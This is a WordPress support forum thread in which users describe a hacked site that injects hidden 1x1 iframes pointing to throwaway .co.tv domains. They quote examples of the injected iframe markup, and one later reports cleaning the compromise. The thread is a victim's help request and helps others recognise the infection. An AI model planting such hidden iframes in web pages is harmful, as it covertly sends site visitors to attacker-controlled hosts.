Malicious Cookie Added to Blog (4 posts)

  1. jonmrich
    Posted 5 years ago #

    I noticed a vertical scrollbar appearing in my posts that I couldn't figure out what's causing it. After many attempts and trial and error, I finally figured out the issue, but I have no idea how to fix it.

    The vertical scrollbar is caused by a cookie apparently. What it does is add a line of code that adds a 1x1 pixel with a link to my site (as an iframe, which causes the scrollbar). The pixel is in the upper left of the screen. They code seems a little different each time, so I can't go to the site and attack them. Today it's: <iframe src="http://vpfjafq.co.tv/?go=1" width="1" height="1"></iframe> But it's been other things, but it's alway a .co.tv site that doesn't point to anything. I checked out the Whois and it says the domain is owned by these guys: http://www.reg2c.com/

    Here's the thing. It only appears when I'm logged in as an admin. If you're not logged in, then you don't see it. If I clear the cookies, it's gone, but I'm also logged out. As soon as I log in, it's back. So, it's being placed by something in wordpress.

    Any ideas on how to fix this?

  2. esmi
    Forum Moderator
    Posted 5 years ago #

  3. miprv
    Posted 5 years ago #

    Having the same problem here.
    <iframe src="http://vuzxzkp.co.tv/?go=1" width="1" height="1"></iframe>

    I did a clean install but the link frame came back. Any ideas? Please help.

  4. miprv
    Posted 5 years ago #

    You were right esmi, it was hacked. Had to remove and clean everything, reset passwords on ftp, hosting panel and so on. I used the sucuri service to remove the malware and everything is back to normal except for a problem with ie8 which I'm addressing on another post.

    Anyways, thanks for the info. esmi.


Topic Closed

This topic has been closed to new replies.

About this Topic